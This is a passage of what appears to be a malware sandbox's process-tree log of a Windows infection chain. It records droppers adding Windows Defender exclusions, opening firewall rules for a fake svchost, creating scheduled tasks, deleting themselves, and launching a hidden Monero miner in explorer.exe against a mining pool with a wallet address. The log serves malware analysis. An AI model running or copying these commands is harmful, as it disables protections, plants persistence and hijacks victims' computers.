C:\Users\Admin\AppData\Local\Temp\5992890b-7128-476b-a22d-a8ee3419ba3a\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\5992890b-7128-476b-a22d-a8ee3419ba3a\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\5992890b-7128-476b-a22d-a8ee3419ba3a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run7⤵PID:6672
-
C:\Users\Admin\AppData\Local\Temp\5992890b-7128-476b-a22d-a8ee3419ba3a\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\5992890b-7128-476b-a22d-a8ee3419ba3a\AdvancedRun.exe" /SpecialRun 4101d8 66728⤵PID:6896
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\IOKTLFZf3JUKpImEahj0iLmJ.exe" -Force7⤵PID:6552
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\IOKTLFZf3JUKpImEahj0iLmJ.exe" -Force7⤵PID:6664
-
-
C:\Users\Admin\Pictures\Adobe Films\IOKTLFZf3JUKpImEahj0iLmJ.exe"C:\Users\Admin\Pictures\Adobe Films\IOKTLFZf3JUKpImEahj0iLmJ.exe"7⤵PID:6684
-
-
-
C:\Users\Admin\Pictures\Adobe Films\eMQgNSztaN6oyoijq6QyFQKC.exe"C:\Users\Admin\Pictures\Adobe Films\eMQgNSztaN6oyoijq6QyFQKC.exe"6⤵PID:5128
-
C:\Users\Admin\Pictures\Adobe Films\eMQgNSztaN6oyoijq6QyFQKC.exe"C:\Users\Admin\Pictures\Adobe Films\eMQgNSztaN6oyoijq6QyFQKC.exe"7⤵PID:6060
-
-
-
C:\Users\Admin\Pictures\Adobe Films\4ayFPPPanDu_Sh2LOTawhisg.exe"C:\Users\Admin\Pictures\Adobe Films\4ayFPPPanDu_Sh2LOTawhisg.exe"6⤵
- Suspicious behavior: MapViewOfSection
PID:3300
-
-
C:\Users\Admin\Pictures\Adobe Films\pQjUUOA4lO2WIokCIKkU45AC.exe"C:\Users\Admin\Pictures\Adobe Films\pQjUUOA4lO2WIokCIKkU45AC.exe"6⤵PID:3664
-
-
C:\Users\Admin\Pictures\Adobe Films\T10nlJzuGkZaNPh6Fg2pywQn.exe"C:\Users\Admin\Pictures\Adobe Films\T10nlJzuGkZaNPh6Fg2pywQn.exe"6⤵PID:2728
-
-
C:\Users\Admin\Pictures\Adobe Films\9ENuRqCKtFJabq2jSWJ3H4NV.exe"C:\Users\Admin\Pictures\Adobe Films\9ENuRqCKtFJabq2jSWJ3H4NV.exe"6⤵PID:3208
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"7⤵PID:6224
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"8⤵PID:3636
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3636.0.1477128407\1121882873" -parentBuildID 20200403170909 -prefsHandle 1436 -prefMapHandle 1428 -prefsLen 1 -prefMapSize 219808 -appdir "C:\Program Files\Mozilla Firefox\browser" - 3636 "\\.\pipe\gecko-crash-server-pipe.3636" 1508 gpu9⤵PID:2292
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3636.3.1891800210\101154129" -childID 1 -isForBrowser -prefsHandle 5640 -prefMapHandle 5636 -prefsLen 186 -prefMapSize 219808 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 3636 "\\.\pipe\gecko-crash-server-pipe.3636" 5652 tab9⤵PID:7628
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3636.13.1628485684\65691356" -childID 2 -isForBrowser -prefsHandle 4888 -prefMapHandle 5056 -prefsLen 7358 -prefMapSize 219808 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 3636 "\\.\pipe\gecko-crash-server-pipe.3636" 4328 tab9⤵PID:3600
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3636.20.619558217\733132888" -childID 3 -isForBrowser -prefsHandle 3244 -prefMapHandle 3160 -prefsLen 7358 -prefMapSize 219808 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 3636 "\\.\pipe\gecko-crash-server-pipe.3636" 4696 tab9⤵PID:4032
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"7⤵PID:5300
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffe658d4f50,0x7ffe658d4f60,0x7ffe658d4f708⤵PID:7572
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1684,6386477672544372376,15141329817815753588,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1696 /prefetch:28⤵PID:7304
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1684,6386477672544372376,15141329817815753588,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2036 /prefetch:88⤵PID:7540
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1684,6386477672544372376,15141329817815753588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2428 /prefetch:88⤵PID:8188
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1684,6386477672544372376,15141329817815753588,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2812 /prefetch:18⤵PID:7712
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1684,6386477672544372376,15141329817815753588,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2796 /prefetch:18⤵PID:7824
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1684,6386477672544372376,15141329817815753588,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3600 /prefetch:18⤵PID:652
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1684,6386477672544372376,15141329817815753588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3904 /prefetch:18⤵PID:1512
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1684,6386477672544372376,15141329817815753588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4600 /prefetch:88⤵PID:6396
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1684,6386477672544372376,15141329817815753588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4732 /prefetch:88⤵PID:4576
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 3208 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Pictures\Adobe Films\9ENuRqCKtFJabq2jSWJ3H4NV.exe"7⤵PID:4428
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 32088⤵
- Kills process with taskkill
PID:5624
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 3208 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Pictures\Adobe Films\9ENuRqCKtFJabq2jSWJ3H4NV.exe"7⤵PID:8128
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 32088⤵
- Kills process with taskkill
PID:7272
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\_NSVp7TF_PP_1yvQhQEQuqvn.exe"C:\Users\Admin\Pictures\Adobe Films\_NSVp7TF_PP_1yvQhQEQuqvn.exe"6⤵PID:3744
-
-
C:\Users\Admin\Pictures\Adobe Films\dAqxabAhJ3yZixnae027d4DG.exe"C:\Users\Admin\Pictures\Adobe Films\dAqxabAhJ3yZixnae027d4DG.exe"6⤵PID:3672
-
-
C:\Users\Admin\Pictures\Adobe Films\_gb7CqWeunhNM_7lvUgMe2NV.exe"C:\Users\Admin\Pictures\Adobe Films\_gb7CqWeunhNM_7lvUgMe2NV.exe"6⤵PID:5556
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MjpFiZVjH.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MjpFiZVjH.exe"7⤵PID:2060
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\8⤵PID:5316
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵PID:2160
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM8⤵
- Creates scheduled task(s)
PID:6172
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵PID:6164
-
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal8⤵PID:6252
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\9⤵PID:6424
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes9⤵PID:4608
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes9⤵PID:6168
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\NN7x7xlUxOSrWcAdAVHYdVIR.exe"C:\Users\Admin\Pictures\Adobe Films\NN7x7xlUxOSrWcAdAVHYdVIR.exe"6⤵PID:4176
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=17⤵PID:4104
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--DzBsjyZ8js"8⤵PID:7476
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ffe65b5dec0,0x7ffe65b5ded0,0x7ffe65b5dee09⤵PID:2596
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff7c7e19e70,0x7ff7c7e19e80,0x7ff7c7e19e9010⤵PID:6188
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1896,80753844509417779,6353119896529124255,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7476_1673857109" --mojo-platform-channel-handle=1972 /prefetch:89⤵PID:4496
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1896,80753844509417779,6353119896529124255,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7476_1673857109" --mojo-platform-channel-handle=1960 /prefetch:89⤵PID:7028
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1896,80753844509417779,6353119896529124255,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7476_1673857109" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1912 /prefetch:29⤵PID:2688
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1896,80753844509417779,6353119896529124255,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7476_1673857109" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2508 /prefetch:19⤵PID:7936
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1896,80753844509417779,6353119896529124255,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7476_1673857109" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2704 /prefetch:19⤵PID:4640
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1896,80753844509417779,6353119896529124255,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7476_1673857109" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3368 /prefetch:29⤵PID:7484
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1896,80753844509417779,6353119896529124255,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7476_1673857109" --mojo-platform-channel-handle=3380 /prefetch:89⤵PID:1068
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1896,80753844509417779,6353119896529124255,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7476_1673857109" --mojo-platform-channel-handle=3900 /prefetch:89⤵PID:3880
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1896,80753844509417779,6353119896529124255,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7476_1673857109" --mojo-platform-channel-handle=3668 /prefetch:89⤵PID:8128
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1896,80753844509417779,6353119896529124255,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7476_1673857109" --mojo-platform-channel-handle=3080 /prefetch:89⤵PID:6204
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1896,80753844509417779,6353119896529124255,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7476_1673857109" --mojo-platform-channel-handle=3076 /prefetch:89⤵PID:5464
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon209b3da1556b9a317.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4260 -
C:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon209b3da1556b9a317.exeMon209b3da1556b9a317.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1364 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
PID:2932 -
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵
- Executes dropped EXE
PID:2024
-
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4940 -
C:\Users\Admin\AppData\Roaming\1290819.scr"C:\Users\Admin\AppData\Roaming\1290819.scr" /S8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3876
-
-
C:\Users\Admin\AppData\Roaming\7371162.scr"C:\Users\Admin\AppData\Roaming\7371162.scr" /S8⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4852 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"9⤵PID:612
-
-
-
C:\Users\Admin\AppData\Roaming\8767698.scr"C:\Users\Admin\AppData\Roaming\8767698.scr" /S8⤵
- Executes dropped EXE
PID:5056
-
-
C:\Users\Admin\AppData\Roaming\5286563.scr"C:\Users\Admin\AppData\Roaming\5286563.scr" /S8⤵PID:1468
-
-
C:\Users\Admin\AppData\Roaming\7939230.scr"C:\Users\Admin\AppData\Roaming\7939230.scr" /S8⤵PID:1164
-
-
C:\Users\Admin\AppData\Roaming\7529472.scr"C:\Users\Admin\AppData\Roaming\7529472.scr" /S8⤵PID:3304
-
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe"C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe"7⤵
- Executes dropped EXE
PID:3272 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 16768⤵
- Program crash
PID:6772
-
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3932 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3932 -s 15488⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4252
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
PID:4544 -
C:\Users\Admin\AppData\Local\Temp\is-IV99R.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-IV99R.tmp\setup.tmp" /SL5="$6011C,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2408 -
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT9⤵
- Executes dropped EXE
PID:760 -
C:\Users\Admin\AppData\Local\Temp\is-6QG7G.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-6QG7G.tmp\setup.tmp" /SL5="$102B8,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT10⤵PID:2980
-
C:\Users\Admin\AppData\Local\Temp\is-G0KAJ.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-G0KAJ.tmp\postback.exe" ss111⤵PID:5316
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
- Executes dropped EXE
PID:3864 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:5964
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:836
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵PID:5584
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:6480
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:1188
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵PID:6652
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:2256
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon20b6f9d5bd03a305.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon20b6f9d5bd03a305.exeMon20b6f9d5bd03a305.exe5⤵
- Executes dropped EXE
PID:3092
-
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2836 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:4860
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4016
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:3344
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3344 -s 4962⤵
- Program crash
PID:4204
-
-
C:\Users\Admin\AppData\Local\Temp\B23B.exeC:\Users\Admin\AppData\Local\Temp\B23B.exe1⤵PID:7308
-
C:\Windows\System32\IME\SHARED\imebroker.exeC:\Windows\System32\IME\SHARED\imebroker.exe -Embedding1⤵PID:7872
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵PID:7516
-
C:\Users\Admin\AppData\Roaming\ubeivtgC:\Users\Admin\AppData\Roaming\ubeivtg1⤵PID:6524
-
C:\Users\Admin\AppData\Roaming\hbeivtgC:\Users\Admin\AppData\Roaming\hbeivtg1⤵PID:7608
-
C:\Windows\System32\IME\SHARED\imebroker.exeC:\Windows\System32\IME\SHARED\imebroker.exe -Embedding1⤵PID:6168